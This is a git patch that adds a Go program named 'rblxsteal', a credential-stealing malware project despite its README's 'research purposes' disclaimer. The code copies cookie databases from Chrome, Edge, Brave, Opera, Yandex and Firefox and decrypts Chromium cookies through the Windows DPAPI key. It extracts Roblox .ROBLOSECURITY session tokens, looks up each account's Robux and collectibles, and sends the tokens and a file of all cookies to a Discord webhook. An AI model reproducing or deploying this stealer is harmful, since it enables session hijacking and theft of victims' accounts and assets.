From 23f75ef2dab5e5e69c2387bfb7602a7cd7645ac4 Mon Sep 17 00:00:00 2001
From: scxr <cswilson@zoho.com>
Date: Thu, 23 Feb 2023 21:11:57 +0000
Subject: [PATCH] add files

---
 README.md                 |   3 +
 go.mod                    |  10 ++
 go.sum                    |  14 ++
 main.go                   | 329 ++++++++++++++++++++++++++++++++++++++++++++++
 roblox/robloxFunctions.go |  93 +++++++++++++
 5 files changed, 449 insertions(+)
 create mode 100644 README.md
 create mode 100644 go.mod
 create mode 100644 go.sum
 create mode 100644 main.go
 create mode 100644 roblox/robloxFunctions.go

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..cb4e228
--- /dev/null
+++ b/README.md
@@ -0,0 +1,3 @@
+I am not responsible for anything malicious done
+I do not condone malicious activities
+I wrote this for research purposes.
\ No newline at end of file
diff --git a/go.mod b/go.mod
new file mode 100644
index 0000000..fd212d5
--- /dev/null
+++ b/go.mod
@@ -0,0 +1,10 @@
+module rblxsteal
+
+go 1.20
+
+require (
+	github.com/DisgoOrg/disgohook v1.4.4 // indirect
+	github.com/DisgoOrg/log v1.1.0 // indirect
+	github.com/DisgoOrg/restclient v1.2.8 // indirect
+	github.com/mattn/go-sqlite3 v1.14.16 // indirect
+)
diff --git a/go.sum b/go.sum
new file mode 100644
index 0000000..36a31d0
--- /dev/null
+++ b/go.sum
@@ -0,0 +1,14 @@
+github.com/DisgoOrg/disgohook v1.4.4 h1:6xU+nRtyCYX7RyKvRnroJE8JMv+YIrQEMBDGUjBGDlQ=
+github.com/DisgoOrg/disgohook v1.4.4/go.mod h1:l7r9dZgfkA3KiV+ErxqweKaknnskmzZO+SRTNHvJTUU=
+github.com/DisgoOrg/log v1.1.0 h1:a6hLfVSDuTFJc5AKQ8FDYQ5TASnwk3tciUyXThm1CR4=
+github.com/DisgoOrg/log v1.1.0/go.mod h1:Qihgz6fax3JCfuO7vxVavL0LyHS0sUdQ9OmykQ2fiQs=
+github.com/DisgoOrg/restclient v1.2.8 h1:0Kv2g2bNYUvAAeIpJ1oNHorRcj5z6qkO2kOlm4R7cAs=
+github.com/DisgoOrg/restclient v1.2.8/go.mod h1:2pc/htya/5kjxvWNYya98sb8B4mexobxmWvhTiWPt94=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/mattn/go-sqlite3 v1.14.16 h1:yOQRA0RpS5PFz/oikGwBEqvAWhWg5ufRz4ETLjwpU1Y=
+github.com/mattn/go-sqlite3 v1.14.16/go.mod h1:2eHXhiwb8IkHr+BDWZGa96P6+rkvnG63S2DGjv9HUNg=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/main.go b/main.go
new file mode 100644
index 0000000..abee6d3
--- /dev/null
+++ b/main.go
@@ -0,0 +1,329 @@
+package main
+
+import (
+	"crypto/aes"
+	"crypto/cipher"
+	"database/sql"
+	b64 "encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"log"
+	"math/rand"
+	"os"
+	"path/filepath"
+	R "rblxsteal/roblox"
+	"strings"
+	"syscall"
+	"unsafe"
+
+	"github.com/DisgoOrg/disgohook"
+	"github.com/DisgoOrg/disgohook/api"
+	_ "github.com/mattn/go-sqlite3"
+)
+
+var webhook string = "webhook here"
+var webhook_id string = strings.Split(webhook, "/")[5] + "/" + strings.Split(webhook, "/")[6]
+
+type BrowserPath struct {
+	name        string
+	processname string
+	token       string
+	password    string
+	cookies     string
+	extensions  string
+}
+type Output struct {
+	host_key interface{}
+	name     interface{}
+	enc      interface{}
+}
+
+type PasswordOutput struct {
+	url      string
+	username string
+	password []byte
+}
+
+type MozCookies struct {
+	host  string
+	name  string
+	value []byte
+}
+
+type Cookies struct {
+	url   string
+	name  string
+	value string
+}
+
+type mystruct struct {
+	Hello string `json:"hello,omitempty"`
+}
+
+type DATA_BLOB struct {
+	cbData uint32
+	pbData *byte
+}
+
+func NewBlob(d []byte) *DATA_BLOB {
+	if len(d) == 0 {
+		return &DATA_BLOB{}
+	}
+	return &DATA_BLOB{
+		pbData: &d[0],
+		cbData: uint32(len(d)),
+	}
+}
+
+func unencrypt(buff []byte, master_key []byte) string {
+
+	starts := string(buff[:3])
+	if starts == "v10" || starts == "v11" {
+		iv := buff[3:15]
+		payload := buff[15:]
+		block, err := aes.NewCipher(master_key)
+		if err != nil {
+			panic(err.Error())
+		}
+		aead, err := cipher.NewGCM(block)
+		if err != nil {
+			panic(err.Error())
+		}
+		decrypted_pass, err := aead.Open(nil, iv, payload, nil)
+		if err != nil {
+			panic(err.Error())
+		}
+		return string(decrypted_pass)
+	}
+	return ""
+
+}
+
+func (b *DATA_BLOB) ToByteArray() []byte {
+	d := make([]byte, b.cbData)
+	copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:])
+	return d
+}
+
+func GetEncryptionKey() []byte {
+	local_path := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Local", "Google", "Chrome", "User Data", "Local State")
+	local_state_data, err := ioutil.ReadFile(local_path)
+	if err != nil {
+
+	}
+	data := make(map[string]interface{})
+	err = json.Unmarshal([]byte(local_state_data), &data)
+	if err != nil {
+
+	}
+	os_crypt := data["os_crypt"].(map[string]interface{})
+	key := os_crypt["encrypted_key"]
+	decoded_key, _ := b64.StdEncoding.DecodeString(key.(string))
+	unprotected_key := decoded_key[5:]
+	decreyptedkey, e := Decrypt(unprotected_key)
+	if e != nil {
+	}
+	return decreyptedkey
+}
+func Decrypt(data []byte) ([]byte, error) {
+	dllcrypt32 := syscall.NewLazyDLL("Crypt32.dll")
+	procDecryptData := dllcrypt32.NewProc("CryptUnprotectData")
+	dllkernel32 := syscall.NewLazyDLL("Kernel32.dll")
+	procLocalFree := dllkernel32.NewProc("LocalFree")
+	var outblob DATA_BLOB
+	r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob)))
+	if r == 0 {
+		return nil, err
+	}
+	defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData)))
+	return outblob.ToByteArray(), nil
+}
+
+const letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
+
+func checkPathExists(p string) bool {
+	_, err := os.Stat(p)
+	if err == nil {
+		return true
+	}
+	if os.IsNotExist(err) {
+		return false
+	}
+	return false
+}
+func RandStringBytes(n int) string {
+	b := make([]byte, n)
+	for i := range b {
+		b[i] = letterBytes[rand.Intn(len(letterBytes))]
+	}
+	return string(b)
+}
+
+func getCookies(path string, cookiePath string, cookies []Cookies) []Cookies {
+	if !checkPathExists(path) {
+		return cookies
+	}
+	pathC := path + cookiePath + "/Cookies"
+
+	if !checkPathExists(pathC) {
+		return cookies
+	}
+
+	random_path := "kur" + RandStringBytes(8) + ".db"
+	f, _ := ioutil.ReadFile(pathC)
+	os.Create(random_path)
+	os.WriteFile(random_path, f, 0644)
+	db, err := sql.Open("sqlite3", random_path)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer db.Close()
+	row, err := db.Query("SELECT host_key, name, encrypted_value FROM cookies")
+	os.Remove(random_path)
+	if err != nil {
+		log.Fatal(err)
+	}
+	pathKey := path + "/Local State"
+	local_state_data, err := ioutil.ReadFile(pathKey)
+	if err != nil {
+		log.Fatal(err)
+	}
+	data := make(map[string]interface{})
+	err = json.Unmarshal([]byte(local_state_data), &data)
+	if err != nil {
+		log.Fatal(err)
+	}
+	os_crypt := data["os_crypt"].(map[string]interface{})
+	key := os_crypt["encrypted_key"]
+	decoded_key, _ := b64.StdEncoding.DecodeString(key.(string))
+	unprotected_key := decoded_key[5:]
+	decreyptedkey, e := Decrypt(unprotected_key)
+	if e != nil {
+		os.Exit(0)
+	}
+	defer row.Close()
+	for row.Next() {
+		var rowout Output
+		row.Scan(&rowout.host_key, &rowout.name, &rowout.enc)
+		cookie := unencrypt(rowout.enc.([]byte), decreyptedkey)
+		tmpCookie := Cookies{rowout.host_key.(string), rowout.name.(string), cookie}
+		cookies = append(cookies, tmpCookie)
+	}
+	return cookies
+
+}
+
+func firefox(cookies []Cookies) []Cookies {
+	path := os.Getenv("APPDATA") + `\Mozilla\Firefox\Profiles`
+	if !checkPathExists(path) {
+		return cookies
+	}
+	folders, err := os.ReadDir(path)
+	firefox_cookies := []string{}
+	if err != nil {
+		log.Fatal(err)
+	}
+	for _, dir := range folders {
+		subdir_content, err := os.ReadDir(path + "\\" + dir.Name())
+		if err != nil {
+			log.Fatal(err)
+		}
+		for _, file := range subdir_content {
+			if file.Name() == "cookies.sqlite" {
+				firefox_cookies = append(firefox_cookies, path+"\\"+dir.Name()+"\\cookies.sqlite")
+			}
+		}
+	}
+	for _, i := range firefox_cookies {
+		tmpfp := "kur" + RandStringBytes(8) + ".db"
+		f, _ := ioutil.ReadFile(i)
+		os.Create(tmpfp)
+		os.WriteFile(tmpfp, f, 0644)
+		db, err := sql.Open("sqlite3", tmpfp)
+		defer db.Close()
+		defer os.Remove(tmpfp)
+		if err != nil {
+			os.Remove(tmpfp)
+			log.Fatal(err)
+		}
+		row, err := db.Query("SELECT host, name, value FROM moz_cookies")
+		for row.Next() {
+			var rowout MozCookies
+			row.Scan(&rowout.host, &rowout.name, &rowout.value)
+			tmpCookie := Cookies{rowout.host, rowout.name, string(rowout.value)}
+			cookies = append(cookies, tmpCookie)
+		}
+	}
+	return cookies
+}
+
+func createCookiesFile(cookies []Cookies) string {
+	outStr := ""
+
+	for _, i := range cookies {
+		outStr += fmt.Sprintf("URL: %s | NAME: %s | VALUE: %s\n", i.url, i.name, i.value)
+	}
+	return outStr
+}
+
+func createRobloxDiscordWh(data R.UserInfo) {
+	webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id)
+	tosend := fmt.Sprintf("`User ID: `: `%d`\n`User Name`: `%s`\n`Robux`:`%d`\n`BuildersClub`:`%t`\n`Premium`:`%t`\n__Limiteds__ \n```", data.UserID, data.UserName, data.Robux, data.BuildersClub, data.IsPremium)
+	for _, asset := range data.Limiteds {
+		tosend += fmt.Sprintf("Name: %s | RAP: %g\n", asset.Name, asset.RecentAveragePrice)
+	}
+	tosend += "```"
+	tosend += fmt.Sprintf("\n`Token`: `%s`", data.Token)
+
+	webhook.SendContent(tosend)
+
+}
+
+func main() {
+	fmt.Println(webhook_id)
+	allCookies := []Cookies{}
+	roaming := os.Getenv("APPDATA")
+	local := os.Getenv("LOCALAPPDATA")
+	operaGx := BrowserPath{roaming + "/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	opera := BrowserPath{roaming + "Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	operaNeon := BrowserPath{roaming + "/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	chrome := BrowserPath{local + "/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	chromeSxs := BrowserPath{local + "/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	brave := BrowserPath{local + "/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	yandex := BrowserPath{local + "/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	edge := BrowserPath{local + "/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
+	browserPaths := []BrowserPath{operaGx, opera, operaNeon, chrome, chromeSxs, brave, yandex, edge}
+	for _, i := range browserPaths {
+		allCookies = getCookies(i.name, i.cookies, allCookies)
+	}
+	allCookies = firefox(allCookies)
+	rblxCookies := []string{}
+	for _, i := range allCookies {
+		if i.name == ".ROBLOSECURITY" {
+			rblxCookies = append(rblxCookies, i.value)
+		}
+
+	}
+
+	if len(rblxCookies) != 0 {
+		rblxstuff := R.GetRobloxStuff(rblxCookies)
+		for _, i := range rblxstuff {
+			createRobloxDiscordWh(i)
+		}
+	}
+	towrite := createCookiesFile(allCookies)
+
+	os.Create("COOKIES.txt")
+	os.WriteFile("COOKIES.txt", []byte(towrite), 0644)
+	webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id)
+	reader, _ := os.Open("COOKIES.txt")
+	webhook.SendMessage(api.NewWebhookMessageCreateBuilder().SetContent("All Cookies logged").AddFile("COOKIES.txt", reader).Build())
+	os.Remove("COOKIES.txt")
+	here, _ := os.ReadDir("./")
+	for _, i := range here {
+		if strings.HasSuffix(i.Name(), ".db") {
+			os.Remove(i.Name())
+		}
+	}
+}
diff --git a/roblox/robloxFunctions.go b/roblox/robloxFunctions.go
new file mode 100644
index 0000000..0db33c0
--- /dev/null
+++ b/roblox/robloxFunctions.go
@@ -0,0 +1,93 @@
+package rblxsteal
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"log"
+	"net/http"
+)
+
+type UserInfo struct {
+	UserID       int    `json:"UserID"`
+	UserName     string `json:"UserName"`
+	Robux        int    `json:"RobuxBalance"`
+	Thumbnail    string `json:"ThumbnailUrl"`
+	BuildersClub bool   `json:"IsAnyBuildersClubMember"`
+	IsPremium    bool   `json:"IsPremium"`
+	Limiteds     []Asset
+	Token        string
+}
+
+type Asset struct {
+	Name               string  `json:"name"`
+	RecentAveragePrice float64 `json:"recentAveragePrice"`
+}
+
+type Response struct {
+	Data []Asset `json:"data"`
+}
+
+func CheckToken(token string) (UserInfo, bool) {
+	client := http.Client{}
+	userinfo := UserInfo{}
+	req, err := http.NewRequest("GET", "https://www.roblox.com/mobileapi/userinfo", nil)
+	if err != nil {
+		log.Fatal(err)
+	}
+	cookie := http.Cookie{Name: ".ROBLOSECURITY", Value: token}
+	req.AddCookie(&cookie)
+	res, err := client.Do(req)
+	body, err := ioutil.ReadAll(res.Body)
+	sb := string(body)
+
+	if len(sb) > 500 {
+		return UserInfo{}, false
+	} else {
+		err := json.Unmarshal([]byte(sb), &userinfo)
+		if err != nil {
+			log.Fatal(err)
+		}
+		return userinfo, true
+	}
+}
+
+func GetLimiteds(id int) []Asset {
+	client := http.Client{}
+	req, err := http.NewRequest("GET", "https://inventory.roblox.com/v1/users/"+fmt.Sprint(id)+"/assets/collectibles", nil)
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	res, err := client.Do(req)
+	body, err := ioutil.ReadAll(res.Body)
+	sb := string(body)
+	var response Response
+	assets := []Asset{}
+	err = json.Unmarshal([]byte(sb), &response)
+
+	if err != nil {
+		log.Fatal(err)
+	}
+	for _, asset := range response.Data {
+		tmpAsset := Asset{asset.Name, asset.RecentAveragePrice}
+		assets = append(assets, tmpAsset)
+	}
+	return assets
+}
+
+func GetRobloxStuff(cookies []string) []UserInfo {
+	users := []UserInfo{}
+	for _, i := range cookies {
+		userInfo, valid := CheckToken(i)
+		userInfo.Token = i
+		if valid != false {
+			userInfo.Limiteds = GetLimiteds(userInfo.UserID)
+			users = append(users, userInfo)
+
+		} else {
+
+		}
+	}
+	return users
+}